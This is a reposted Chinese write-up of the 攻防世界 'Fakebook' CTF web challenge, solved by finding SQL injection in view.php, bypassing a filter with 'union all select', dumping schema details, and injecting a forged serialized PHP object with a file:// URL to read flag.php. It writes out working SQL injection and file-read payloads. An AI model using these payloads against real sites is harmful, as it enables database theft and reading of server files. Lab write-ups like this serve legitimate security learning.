攻防世界 | Web-Fakebook


这关一进来一个登录框,一个注册框,题目没给什么提示

先注册一个试试(但是注册完之后退不回去了 需要重新开一个浏览器)

注册完随便点一点,发现URL有点异样

http://111.200.241.244:54356/view.php?no=1

看起来又是个SQL注入 先加个单引号——果然报错了

攻防世界 | Web-Fakebook

接着用order by 测试出来有四个字段

常规的联合查询注入搞一下union select(我猜应该没这么简单)

攻防世界 | Web-Fakebook

但是!union select 不行 ,我们试试union all select(成功绕过)

攻防世界 | Web-Fakebook

 

 

?no=0 union all select 1,database(),3,4 --+ 数据库名fakebook

?no=0 union all select 1,group_concat(table_name),3,4 from information_schema.tables --+ 拿到所有表名字

?no=0 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+ 字段名users

?no=0 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+ 字段值 no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

?no=0 union all select 1,group_concat(data),3,4 from users--+

这里得到了一串序列化的值,感觉有点懵逼,这不是我自己注册的信息吗?

O:8:"UserInfo":3:

{s:4:"name";s:3:"abc";s:3:"age";i:123;s:4:"blog";s:10:"www.bb.com";}

 

那么这关考的不光是SQL注入了 重新理一下思路,扔到御剑里跑一跑

发现有flag.php和robots.txt。访问robots.txt

攻防世界 | Web-Fakebook

访问/user.php.bak 直接下载了一个文件 打开看一下是个php代码

 

这里彻底不会了 看下大佬的思路

通过构造反序列化语句,使用file协议去读取/var/www/html/flag.php的内容(file协议主要用于访问计算机本地文件,基本格式为:file:///文件路径)

构造出以下payload:

?no=0 union all%20select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"abc";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

攻防世界 | Web-Fakebook

 

 

右键查看源码

攻防世界 | Web-Fakebook

 

 

 攻防世界 | Web-Fakebook

 

参考链接

https://blog.csdn.net/qq_41500251/article/details/105383065?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-4-105383065-blog-104868401.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-4-105383065-blog-104868401.pc_relevant_default&utm_relevant_index=5

 

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/tech/php/280463.html

(0)
上一篇 2022年8月14日 13:00
下一篇 2022年8月14日 13:16

相关推荐

发表回复

登录后才能评论